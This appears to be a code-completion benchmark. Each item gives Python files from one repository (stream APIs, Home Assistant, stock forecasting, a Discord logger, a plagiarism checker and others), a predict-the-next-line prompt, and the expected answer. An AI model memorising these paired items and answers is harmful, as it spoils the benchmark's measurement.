Optional[str] = None verified_mark: bool logged_in: bool # Path: chzzk/models.py class Video(PartialVideo): paid_promotion: bool in_key: str live_open_date: Annotated[datetime, AfterValidator(to_kst)] vod_status: str prev_video: Optional[PartialVideo] = None next_video: Optional[PartialVideo] = None # Path: chzzk/models.py class VideoSearchRecord(SearchRecord): video: VideoMetadata channel: PartialChannel # Path: chzzk/chzzk.py from typing import Optional from chzzk.client import ChzzkClient, Credential, GameClient from chzzk.models import ( Channel, ChannelSearchRecord, LiveDetail, LiveSearchRecord, LiveStatus, SearchCursor, User, Video, VideoSearchRecord, ) class ChzzkLive: def __init__(self, client: ChzzkClient): self._client = client async def status(self, channel_id: str) -> LiveStatus: response = await self._client.get(f"polling/v1/channels/{channel_id}/live-status") return LiveStatus(**response) async def detail(self, channel_id: str) -> LiveDetail: response = await self._client.get(f"service/v1/channels/{channel_id}/live-detail") return LiveDetail(**response) class ChzzkSearch: def __init__(self, client: ChzzkClient): self._client = client async def channels(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[ChannelSearchRecord]: response = await self._client.get( "service/v1/search/channels", params={ "keyword": keyword, "size": size, "offset": offset, }, ) return SearchCursor[ChannelSearchRecord](**response) async def lives(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[LiveSearchRecord]: response = await self._client.get( "service/v1/search/lives", params={ "keyword": keyword, "size": size, "offset": offset, }, ) return SearchCursor[LiveSearchRecord](**response)
async def videos(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[VideoSearchRecord]:
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: pantherale0/ha-fuelprices # Path: custom_components/fuel_prices/const.py CONF_AREAS = "areas" # Path: custom_components/fuel_prices/const.py DOMAIN = "fuel_prices" # Path: custom_components/fuel_prices/entity.py class FeulStationEntity(CoordinatorEntity): """Represents a fuel station.""" def __init__( self, coordinator: FuelPricesCoordinator, fuel_station_id, entity_id, source ) -> None: """Initialize.""" super().__init__(coordinator) self.coordinator: FuelPricesCoordinator = coordinator self._fuel_station_id = fuel_station_id self._entity_id = entity_id self._fuel_station_source = str(source).lower() @property def _fuel_station(self): """Return the fuel station.""" return self.coordinator.api.configured_sources[ self._fuel_station_source ].location_cache[self._fuel_station_id] @property def unique_id(self) -> str | None: """Return unique ID.""" return f"fuelprices_{self._fuel_station_id}_{self._entity_id}" # Path: custom_components/fuel_prices/coordinator.py class FuelPricesCoordinator(DataUpdateCoordinator): """Fuel Prices data coordinator.""" def __init__(self, hass: HomeAssistant, api: FuelPrices, name: str) -> None: """Init the coordinator.""" super().__init__( hass=hass, logger=_LOGGER, name=name, update_interval=timedelta(minutes=30), ) self.api: FuelPrices = api async def _async_update_data(self): """Fetch and update data from the API.""" try: async with async_timeout.timeout(240): return await self.api.update() except TimeoutError as err: _LOGGER.error("Timeout updating fuel price data: %s", err) except TypeError as err: _LOGGER.error("Error updating fuel price data: %s", err) except Exception as err: raise UpdateFailed(f"Error communicating with API {err}") from err # Path: custom_components/fuel_prices/device_tracker.py import logging from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS, CONF_NAME from homeassistant.components.device_tracker.config_entry import ( BaseTrackerEntity, SourceType, ATTR_SOURCE_TYPE, ATTR_LATITUDE, ATTR_LONGITUDE, ) from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import StateType from pyfuelprices.const import PROP_FUEL_LOCATION_SOURCE from .const import CONF_AREAS, DOMAIN from .entity import FeulStationEntity from .coordinator import FuelPricesCoordinator """Device tracker for fuel prices.""" from __future__ import annotations _LOGGER = logging.getLogger(__name__) async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Integration platform creation."""
cooridinator: FuelPricesCoordinator = hass.data[DOMAIN][entry.entry_id]
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: abdellatif-laghjaj/stock-market-prediction # Path: services.py @st.cache_data def load_data(ticker, start, end): """ Load historical stock price data from Yahoo Finance. Parameters: - ticker (str): Stock symbol (e.g., AAPL). - start (str): Start date in the format 'YYYY-MM-DD'. - end (str): End date in the format 'YYYY-MM-DD'. Returns: - data (pd.DataFrame): DataFrame containing historical stock price data. """ try: data = yf.download(ticker, start, end) data.reset_index(inplace=True) return data except Exception as e: st.error(f"Error loading data for {ticker}: {str(e)}") return None # Path: services.py def plot_data(data): """ Plot historical stock price data. Parameters: - data (pd.DataFrame): DataFrame containing historical stock price data. """ fig = go.Figure() fig.add_trace(go.Scatter(x=data['Date'], y=data['Open'], name="stock_open")) fig.add_trace(go.Scatter(x=data['Date'], y=data['Close'], name="stock_close")) fig.update_layout(title_text="Stock Prices Over Time", xaxis_rangeslider_visible=True) st.plotly_chart(fig, use_container_width=True) # Path: services.py def plot_multiple_data(data, stock_names): """ Plot forecasted stock prices for multiple stocks. Parameters: - data (list): List of DataFrames containing forecasted stock price data. - stock_names (list): List of stock names corresponding to the forecasted data. """ fig = go.Figure() for i, stock_data in enumerate(data): fig.add_trace(go.Scatter(x=stock_data['ds'], y=stock_data['yhat'], name=f"yhat - {stock_names[i]}")) fig.update_layout(title_text="Stock Prices Over Time", xaxis_rangeslider_visible=True) st.plotly_chart(fig, use_container_width=True) # Path: services.py def plot_volume(data): """ Plot historical stock volume data. Parameters: - data (pd.DataFrame): DataFrame containing historical stock volume data. """ fig = go.Figure() fig.add_trace(go.Scatter(x=data['Date'], y=data['Volume'], name="stock_volume")) fig.update_layout(title_text="Stock Volume Over Time", xaxis_rangeslider_visible=True) st.plotly_chart(fig, use_container_width=True) # Path: main.py from time import sleep from sklearn.metrics import mean_absolute_error from streamlit_option_menu import option_menu from datetime import date from prophet import Prophet from prophet.plot import plot_plotly from services import load_data, plot_data, plot_multiple_data, plot_volume import uuid import pandas as pd import streamlit as st # Set page layout to wide st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈") # Sidebar st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True) st.sidebar.title("Options") start_date_key = str(uuid.uuid4()) start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key) end_date = st.sidebar.date_input("End date", date.today()) # Header st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True) st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True) selected_tab = option_menu( menu_title=None, options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"], icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"], menu_icon="📊", default_index=0, orientation="horizontal", ) # Stock selection stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL") # Stocks abreviations selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks) selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks) years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5) period = years_to_predict * 365 # Display a loading spinner while loading data with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: replicate/cog-marigold # Path: src/model/rgb_encoder.py class RGBEncoder(nn.Module): """ The encoder of pretrained Stable Diffusion VAE """ def __init__(self, pretrained_path, subfolder=None) -> None: super().__init__() vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder) logging.info(f"pretrained AutoencoderKL loaded from: {pretrained_path}") self.rgb_encoder = nn.Sequential( vae.encoder, vae.quant_conv, ) def to(self, *args, **kwargs): self.rgb_encoder.to(*args, **kwargs) def forward(self, rgb_in): return self.encode(rgb_in) def encode(self, rgb_in): moments = self.rgb_encoder(rgb_in) # [B, 8, H/8, W/8] mean, logvar = torch.chunk(moments, 2, dim=1) rgb_latent = mean return rgb_latent # Path: src/model/stacked_depth_AE.py class StackedDepthAE(nn.Module): """ Tailored pretrained image VAE for depth map. Encode: Depth images are repeated into 3 channels. Decode: The average of 3 chennels are taken as output. """ def __init__(self, pretrained_path, subfolder=None) -> None: super().__init__() self.vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder) logging.info(f"pretrained AutoencoderKL loaded from: {pretrained_path}") def forward(self, depth_in): depth_latent = self.encode(depth_in) depth_out = self.decode(depth_latent) return depth_out def to(self, *args, **kwargs): self.vae.to(*args, **kwargs) @staticmethod def _stack_depth_images(depth_in): if 4 == len(depth_in.shape): stacked = depth_in.repeat(1, 3, 1, 1) elif 3 == len(depth_in.shape): stacked = depth_in.unsqueeze(1) stacked = depth_in.repeat(1, 3, 1, 1) return stacked def encode(self, depth_in): stacked = self._stack_depth_images(depth_in) h = self.vae.encoder(stacked) moments = self.vae.quant_conv(h) mean, logvar = torch.chunk(moments, 2, dim=1) depth_latent = mean return depth_latent def decode(self, depth_latent): z = self.vae.post_quant_conv(depth_latent) stacked = self.vae.decoder(z) depth_mean = stacked.mean(dim=1, keepdim=True) return depth_mean # Path: src/model/marigold_pipeline.py import logging import numpy as np import torch from typing import Dict from diffusers import ( DDIMScheduler, DDPMScheduler, PNDMScheduler, SchedulerMixin, UNet2DConditionModel, ) from torch import nn from torch.nn import Conv2d from torch.nn.parameter import Parameter from tqdm.auto import tqdm from transformers import CLIPTextModel, CLIPTokenizer from .rgb_encoder import RGBEncoder from .stacked_depth_AE import StackedDepthAE # Author: Bingxin Ke # Last modified: 2023-12-11 class MarigoldPipeline(nn.Module): """ Marigold monocular depth estimator. """ def __init__( self, unet_pretrained_path: Dict, # {path: xxx, subfolder: xxx} rgb_encoder_pretrained_path: Dict, depht_ae_pretrained_path: Dict, noise_scheduler_pretrained_path: Dict, tokenizer_pretrained_path: Dict, text_encoder_pretrained_path: Dict, empty_text_embed=None, trainable_unet=False, rgb_latent_scale_factor=0.18215, depth_latent_scale_factor=0.18215, noise_scheduler_type="DDIMScheduler", enable_gradient_checkpointing=False, enable_xformers=True, ) -> None: super().__init__() self.rgb_latent_scale_factor = rgb_latent_scale_factor self.depth_latent_scale_factor = depth_latent_scale_factor self.device = "cpu" # ******* Initialize modules ******* # Trainable modules self.trainable_module_dic: Dict[str, nn.Module] = {} self.trainable_unet = trainable_unet # Denoising UNet self.unet: UNet2DConditionModel = UNet2DConditionModel.from_pretrained( unet_pretrained_path["path"], subfolder=unet_pretrained_path["subfolder"] ) logging.info(f"pretrained UNet loaded from: {unet_pretrained_path}") if 8 != self.unet.config["in_channels"]: self._replace_unet_conv_in() logging.warning("Unet conv_in layer is replaced") if enable_xformers: self.unet.enable_xformers_memory_efficient_attention() else: self.unet.disable_xformers_memory_efficient_attention() # Image encoder self.rgb_encoder = RGBEncoder( pretrained_path=rgb_encoder_pretrained_path["path"], subfolder=rgb_encoder_pretrained_path["subfolder"], ) logging.info( f"pretrained RGBEncoder loaded from: {rgb_encoder_pretrained_path}" ) self.rgb_encoder.requires_grad_(False) # Depth encoder-decoder
self.depth_ae = StackedDepthAE(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: tungeverest/python-k8s-base # Path: core/middlewares/https/process_time.py async def process_time_log_middleware(request: Request, call_next): """ This middleware will log all requests and their processing time. E.g. log: HOST:PORT - GET /ping 200 OK 1.00ms """ logging.debug("middleware: process_time_log_middleware") url = f"{request.method}: {request.url.path}?{request.query_params}" if request.query_params else request.url.path start_time = time.time() response = await call_next(request) process_time = (time.time() - start_time) * 1000 formatted_process_time = "{0:.2f}".format(process_time) host = getattr(getattr(request, "client", None), "host", None) port = getattr(getattr(request, "client", None), "port", None) response.headers["X-Process-Time"] = formatted_process_time try: status_phrase = http.HTTPStatus(response.status_code).phrase except ValueError: status_phrase="" logging.info(f'{host}:{port} - "{request.method} {url}" {response.status_code} {status_phrase} {formatted_process_time}ms') return response # Path: core/middlewares/https/rate_limit.py class RateLimitCoreMiddleware(BaseHTTPMiddleware): # TODO apply = Redis RATE_LIMIT_DURATION = timedelta(seconds=10) RATE_LIMIT_REQUESTS = 5 def __init__(self, app): super().__init__(app) # Dictionary to store request counts for each IP self.request_counts = {} async def dispatch(self, request: Request, call_next): # Get the client's IP address client_ip = request.client.host # Check if IP is already present in request_counts request_count, last_request = self.request_counts.get(client_ip, (0, datetime.min)) # Calculate the time elapsed since the last request elapsed_time = datetime.now() - last_request if elapsed_time > self.RATE_LIMIT_DURATION: request_count = 1 else: if request_count >= self.RATE_LIMIT_REQUESTS: return JSONResponse( status_code=429, content={"detail": "Rate limit exceeded. Please try again later."} ) request_count += 1 # Update the request count and last request timestamp for the IP self.request_counts[client_ip] = (request_count, datetime.now()) response = await call_next(request) return response # Path: src/router.py def index(): # Path: src/setting.py @lru_cache() def get_settings() -> CoreSettings: if getenv("_ENV", None) is None: raise Exception("Cannot get _ENV environment") return CustomSettings() # Path: src/app.py import logging from os import getenv from core.middlewares.https.process_time import process_time_log_middleware from core.middlewares.https.rate_limit import RateLimitCoreMiddleware from fastapi import FastAPI from fastapi.middleware.cors import CORSMiddleware from fastapi.middleware.trustedhost import TrustedHostMiddleware from src.router import router as api_router from src.setting import get_settings logger = logging.getLogger(__name__) def create_app(): settings = get_settings() app = FastAPI( title=f"{settings.PROJECT_NAME}", version=settings.APP_VERSION, debug=settings.DEBUG, description=f""" FastAPI Framework + K8s \n - PROJECT NAME: {settings.PROJECT_NAME} \n - VERSION: {settings.APP_VERSION} \n - ENV: {settings._ENV} \n - DEBUG: {settings.DEBUG} \n - API URI: {settings.API_VERSION_PREFIX} \n """, )
app.include_router(api_router, prefix=settings.API_VERSION_PREFIX)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: CoolPointerException/Amigo # Path: gui/input_validator.py def validate(gui, properties): for prop in properties: match prop: case Properties.PROJECT_NAME: project_name = gui.projects_tab.project_name_entry.get() if not project_name: messagebox.showerror("Error", "Please enter a project name.") return False if project_name in forbidden_names: messagebox.showerror("Error", "Please enter a valid project name. \nForbidden names:\n - " + "\n - " .join(forbidden_names)) return False case Properties.SELECTED_DIRECTORY: selected_directory = gui.projects_tab.selected_directory if not selected_directory: messagebox.showerror("Error", "Please select a directory.") return False case Properties.API_TYPE: api_type = gui.settings_tab.api_type.get() if not api_type: messagebox.showerror("Error", "Please select API type in Settings Tab.") return False case Properties.API_BASE: api_base = gui.settings_tab.api_host_entry.get() if not api_base: messagebox.showerror("Error", "Please enter API base in Settings Tab.") return False case Properties.API_VERSION: api_version = gui.settings_tab.api_version_entry.get() if not api_version: messagebox.showerror("Error", "Please enter API version in Settings Tab.") return False case Properties.API_KEY: api_key = gui.settings_tab.api_key_entry.get() if not api_key: messagebox.showerror("Error", "Please enter API key in Settings Tab.") return False case Properties.GPT_MODEL: gpt_model = gui.settings_tab.gpt_model.get() if not gpt_model: messagebox.showerror("Error", "Please enter GPT model name in Settings Tab.") return False case Properties.GPT_DEPLOYMENT: gpt_deployment = gui.settings_tab.gpt_deployment.get() if not gpt_deployment: messagebox.showerror("Error", "Please enter GPT deployment name in Settings Tab.") return False case Properties.EMBEDDING_MODEL: embedding_model = gui.settings_tab.embeddings_model_entry.get() if not embedding_model: messagebox.showerror("Error", "Please enter embedding model name in Settings Tab.") return False case Properties.EMBEDDING_DEPLOYMENT: embedding_deployment = gui.settings_tab.embeddings_deployment_entry.get() if not embedding_deployment: messagebox.showerror("Error", "Please enter embedding deployment name in Settings Tab.") return False case Properties.PROMPT: prompt = gui.settings_tab.prompt_entry.get("1.0", tk.END) if not prompt: messagebox.showerror("Error", "Please enter a prompt in Settings Tab.") return False case Properties.MAX_TOKENS: max_tokens = gui.settings_tab.max_tokens.get() if not max_tokens: messagebox.showerror("Error", "Please enter max tokens in Settings Tab.") return False case Properties.TASK_REQUIREMENTS: task_requirements = gui.task_tab.task_requirements_entry.get("1.0", tk.END) if not task_requirements: messagebox.showerror("Error", "Please enter a Task requirements.") return False case Properties.SELECTED_PROJECT: selected_project = gui.task_tab.selected_project.get() if not selected_project: messagebox.showerror("Error", "Please select a project.") return False case Properties.THREADS: threads = gui.settings_tab.threads.get() if not threads: messagebox.showerror("Error", "Please enter number of threads in Settings Tab.") return False case Properties.REINDEX_PROJECT: reindex_project = gui.projects_tab.reindex_project.get() if not reindex_project: messagebox.showerror("Error", "Please select a project to reindex.") return False return True # Path: gui/input_validator.py class Properties(Enum): PROJECT_NAME = 1 SELECTED_DIRECTORY = 2 API_TYPE = 3 API_BASE = 4 API_VERSION = 5 API_KEY = 6 GPT_MODEL = 7 GPT_DEPLOYMENT = 8 EMBEDDING_MODEL = 9 EMBEDDING_DEPLOYMENT = 10 PROMPT = 11 MAX_TOKENS = 12 TASK_REQUIREMENTS = 13 SELECTED_PROJECT = 14 THREADS = 15 REINDEX_PROJECT = 16 # Path: gui/llama_index_init.py from tkinter import messagebox from llama_index import ServiceContext, set_global_service_context, OpenAIEmbedding from llama_index.embeddings import AzureOpenAIEmbedding, GeminiEmbedding from llama_index.llms import Gemini, OpenAI, AzureOpenAI from gui.input_validator import validate, Properties def init_llama_index(self, api_type): if self.isLlamaInitialized: return llm = None embed_model = None if api_type == "azure": is_valid = validate(self, [
Properties.API_BASE,
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: redvulpecula/DRILL-Concurrent-Python-1 # Path: video_streaming.py class VideoStream: def __init__(self, url, frames): self.frames = frames self.url = url self.process = Process(target=self.capture, args=(self.frames, self.url)) self.process.start() def capture(self, frames, url): cap = cv2.VideoCapture(url) error_reported = False last_success_time = time.time() video_count = 0 initial_connection_made = False while True: ret, frame = cap.read() if not ret: if time.time() - last_success_time > 60: print("Cannot connect to stream for more than 1 minute. Exiting.") break if not error_reported: if initial_connection_made: video_count += 1 print(f"Finished streaming video number {video_count}.") print("Attempting to reconnect to the next video...") error_reported = True last_success_time = time.time() cap.release() cap = cv2.VideoCapture(url) continue if not initial_connection_made: initial_connection_made = True error_reported = False if not frames.full(): frames.put(frame) def get_frame(self): if not self.frames.empty(): return self.frames.get() def release(self): self.process.terminate() self.process.join() # Path: video_streaming.py def calculate_fps(prev_time, fps): while True: curr_time = time.time() time_diff = curr_time - prev_time if time_diff != 0: # Avoid divide by 0 error fps.value = 1 / time_diff prev_time = curr_time # Path: video_streaming.py def display_and_save_frame(fps_async, fps_stream, frames): prev_time = time.time() while True: frame = frames.get() if frame is None: break curr_time = time.time() time_diff = curr_time - prev_time if time_diff != 0: fps_stream.value = 1 / time_diff prev_time = curr_time display_fps(frame, fps_async, fps_stream) cv2.imshow('RTSP Stream', frame) if cv2.getWindowProperty('RTSP Stream', cv2.WND_PROP_VISIBLE) < 1: break if cv2.waitKey(1) & 0xFF == ord('q'): break # Path: video_streaming.py def check_rtsp_url(url): parsed_url = urlparse(url) host = parsed_url.hostname port = parsed_url.port if parsed_url.port else 554 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((host, port)) sock.close() return True except socket.error: return False # Path: video_streaming.py def read_url_from_file(file_path='source.txt'): with open(file_path, 'r') as file: return file.readline().strip() # Path: imgAlgSelect.py class YOLOProcessor: def __init__(self, frames, yolo_model, device, verbose=False): self.frames = frames self.yolo_model = yolo_model self.device = device self.verbose = verbose def process(self): while True: frame = self.frames.get() if frame is None: break results = self.yolo_model(frame, device=self.device, verbose=self.verbose) result = results[0] bboxes = np.array(result.boxes.xyxy.cpu(), dtype="int") classes = np.array(result.boxes.cls.cpu(), dtype="int") for cls, bbox in zip(classes, bboxes): (x, y, x2, y2) = bbox cv2.rectangle(frame, (x, y), (x2, y2), (0, 0, 225), 2) cv2.putText(frame, str(cls), (x, y - 5), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 225), 2) cv2.imshow('YOLO Model', frame) if cv2.getWindowProperty('YOLO Model', cv2.WND_PROP_VISIBLE) < 1: break if cv2.waitKey(1) & 0xFF == ord('q'): break # Path: main.py import time import torch from multiprocessing import Process, Manager from ultralytics import YOLO from video_streaming import VideoStream, calculate_fps, display_and_save_frame, check_rtsp_url, read_url_from_file from imgAlgSelect import YOLOProcessor class ConcurrencyManager: def __init__(self, url): self.device = 'cuda' if torch.backends.cuda.is_built() else 'mps' if torch.backends.mps.is_available() else 'cpu' self.yolo_model = YOLO("yolov8m.pt") self.manager = Manager() self.url = url self.frames = self.manager.Queue(maxsize=1) self.video_stream = VideoStream(url, self.frames) self.fps_async = self.manager.Value('d', 0.0) self.fps_stream = self.manager.Value('d', 0.0) def start_stream(self): print("Waiting for the stream.") while not check_rtsp_url(self.url): print("Cannot connect to the URL or the port is not open. Retrying.") p_fps = Process(target=calculate_fps, args=(time.time(), self.fps_async)) p_fps.start() p_display = Process(target=display_and_save_frame, args=(self.fps_async, self.fps_stream, self.video_stream.frames)) p_display.start() p_yolo = Process(target=YOLOProcessor(self.video_stream.frames, self.yolo_model, self.device).process) p_yolo.start() p_display.join() p_fps.join() p_yolo.join() self.video_stream.release() def main():
url = read_url_from_file()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: LyubomirT/discord-lle # Path: colorizer.py class Colorizer: def __init__(self, color): self.color = color self.colors = { "red": "\033[31m", "green": "\033[32m", "yellow": "\033[33m", "blue": "\033[34m", "magenta": "\033[35m", "cyan": "\033[36m", "white": "\033[37m", "orange": "\033[38;5;208m", "purple": "\033[38;5;135m", "pink": "\033[38;5;219m", "grey": "\033[38;5;246m", "reset": "\033[0m" } if self.color not in self.colors: raise Exception("Color not found") def colorize(self, text): return self.colors[self.color] + text + self.colors["reset"] # Path: verify_dir.py def verify_dir(log_dir): # Fully verify the directory structure # If it doesn't exist, create it # If it does exist, make sure it is empty or follows the correct format # Check if the log directory exists if not os.path.exists(log_dir): os.mkdir(log_dir) print(Colorizer("cyan").colorize("Log directory created.")) else: print(Colorizer("cyan").colorize("Log directory already exists. In use.")) # Check if the DM directory exists if not os.path.exists(log_dir + "/DMs"): os.mkdir(log_dir + "/DMs") # Check if the server directory exists if not os.path.exists(log_dir + "/Servers"): os.mkdir(log_dir + "/Servers") # Check if the DM directory is empty if not os.listdir(log_dir + "/DMs"): print(Colorizer("cyan").colorize("DM directory is empty.")) else: print(Colorizer("cyan").colorize("DM directory contains log files / other files.")) # Check if the server directory is empty if not os.listdir(log_dir + "/Servers"): print(Colorizer("cyan").colorize("Server directory is empty.")) else: print(Colorizer("cyan").colorize("Server directory contains log files / other files.")) # Path: main.py from dotenv import load_dotenv from discord.ext import commands from discord.commands import Option from discord.ui import Button, View, Select, Modal from colorizer import Colorizer from datetime import datetime from verify_dir import verify_dir import os import requests import json import discord import configparser import asyncio load_dotenv() token = os.getenv("BOT_TOKEN") bot = commands.Bot(command_prefix="!", intents=discord.Intents.all()) log_dir = "_logs_" dm_config = { "enabled": True, "download_images": True, "download_videos": True, "download_audio": True, } server_config = { "enabled": True, "download_images": True, "download_videos": True, "download_audio": True, } printContents = False logtodms = False ownerid = 0 def load_config(): with open("_config_/directories.cfg", "r") as f: try: config = configparser.ConfigParser() config.read_file(f) except: print(Colorizer("red").colorize("Could not load config! The directories.cfg file is missing or corrupt.")) os._exit(1) global log_dir try: log_dir = config["directories"]["log_dir"] except: print(Colorizer("red").colorize("Could not load config! Please specify a proper log directory or use cfg_gen.py to generate a new config file.")) os._exit(1) with open("_config_/types.cfg", "r") as f: try: config = configparser.ConfigParser() config.read_file(f) except: print(Colorizer("red").colorize("Could not load config! The types.cfg file is missing or corrupt.")) os._exit(1) global dm_config try: dm_config["enabled"] = bool(config["direct_messages"]["enabled"]) dm_config["download_images"] = bool(config["direct_messages"]["download_images"]) dm_config["download_videos"] = bool(config["direct_messages"]["download_videos"]) dm_config["download_audio"] = bool(config["direct_messages"]["download_audio"]) except: print(Colorizer("red").colorize("Could not load config! Please specify proper types (DM) or use cfg_gen.py to generate a new config file.")) os._exit(1) global server_config try: server_config["enabled"] = bool(config["servers"]["enabled"]) server_config["download_images"] = bool(config["servers"]["download_images"]) server_config["download_videos"] = bool(config["servers"]["download_videos"]) server_config["download_audio"] = bool(config["servers"]["download_audio"]) except: print(Colorizer("red").colorize("Could not load config! Please specify proper types (server) or use cfg_gen.py to generate a new config file.")) os._exit(1) with open("_config_/misc.cfg", "r") as f: try: config = configparser.ConfigParser() config.read_file(f) except: print(Colorizer("red").colorize("Could not load config! The misc.cfg file is missing or corrupt.")) os._exit(1) global printContents try: printContents = bool(config["Console"]["printContents"]) except: print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (printContents) or use cfg_gen.py to generate a new config file.")) os._exit(1) global logtodms try: logtodms = bool(config["DiscordLog"]["enabled"]) except: print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (logtodms) or use cfg_gen.py to generate a new config file.")) os._exit(1) global ownerid try: ownerid = int(config["DiscordLog"]["ownerid"]) except: print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (ownerid) or use cfg_gen.py to generate a new config file.")) os._exit(1)
verify_dir(log_dir)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: KR1470R/plagiator-py # Path: utils/exists.py def exists(obj, *keys): format_keys = "".join( list(map( lambda key: f"['{key}']", keys )) ) try: return eval(f"obj{format_keys}") except Exception: return None # Path: configs/edupirdie.py API_URI = "https://edubirdie.com/plagiarism-checker-send-data" # Path: configs/edupirdie.py HEADERS = { "Host": "edubirdie.com", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Referer": "https://edubirdie.com/perevirka-na-plagiat", "X-Requested-With": "XMLHttpRequest", "Origin": "https://edubirdie.com", "DNT": "1", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache", } # Path: utils/plagiator.py import json import logging import requests from .exists import exists from configs.edupirdie import API_URI, HEADERS from random_user_agent.user_agent import UserAgent from random_user_agent.params import SoftwareName, OperatingSystem class Plagiator: def __init__(self): self.session = requests.Session() adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000) self.session.mount("https://", adapter) software_names = [software_name.value for software_name in SoftwareName] operating_systems = [operating_system.value for operating_system in OperatingSystem] self.user_agent_rotator = UserAgent( software_names=software_names, operating_systems=operating_systems, limit=1000 ) def concretize_response(self, response: dict): if exists(response, "error") and response["error"]: return response del response["error"] del response["error_code"] if len(response["title"]) == 0: del response["title"] words = response["text"].split(" ") if exists(response, "highlight") and len(response["highlight"]): highlight_text = [] for span in response["highlight"]: span = list(map(int, span)) selected_words = words[span[0]] if ( span[0] == span[1] ) else words[span[0]:span[1]] if isinstance(selected_words, list): selected_words = " ".join(selected_words) highlight_text.append(selected_words) response["highlight"] = highlight_text if exists(response, "matches") and len(response["matches"]): matches_highlight = [] for match in response["matches"]: matched_highlight_text = [] for match_span in match["highlight"]: match_span = list(map(int, match_span)) selected_words = words[match_span[0]] if ( match_span[0] == match_span[1] ) else words[match_span[0]:match_span[1]] if isinstance(selected_words, list): selected_words = " ".join(selected_words) matched_highlight_text.append(selected_words) matches_highlight.append({**match, "highlight": matched_highlight_text}) response["matches"] = matches_highlight return response def __request__(self, text: str, title: str = None): return self.session.post( API_URI, headers={
**HEADERS,
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: fmhy/bot # Path: cogs/_config.py TOKEN = os.getenv("TOKEN", None) GUILD_ID = os.getenv("GUILD_ID", None) OWNERS = os.getenv("OWNERS").split(",") RSS_CHANNELS = os.getenv("RSS_CHANNEL_IDS", None) FEEDS = os.getenv("RSS_FEED_URLS", None) DB = os.getenv("db_uri") OWNERS: list[str] FEEDS: str RSS_CHANNELS: str TOKEN: str # Path: cogs/_helpers.py def fetch_feed(): # Load the seen IDs from the file, or create an empty dictionary sent_articles = list(mycol.find().sort("_id", -1)) for rss_feed_url in rss_feed_urls: # Parse the RSS feed feed = feedparser.parse(rss_feed_url) # Check if the feed was parsed successfully if feed.bozo: print(f"Error parsing RSS feed: {feed.bozo_exception}") print(f"{rss_feed_url}") continue last_entry = feed.entries[0] x = list(mycol.find({"link": last_entry.link})) # print(x) if len(x) == 0: article_title = last_entry.title article_link = last_entry.link mycol.insert_one({"link": last_entry.link}) # print(f"New article: {article_title}") # print(f"Link: {article_link}") yield f"{EMOJI} | {article_title}\n\n{article_link}" # print(f"Parsing complete for {rss_feed_url}") # Path: main.py class 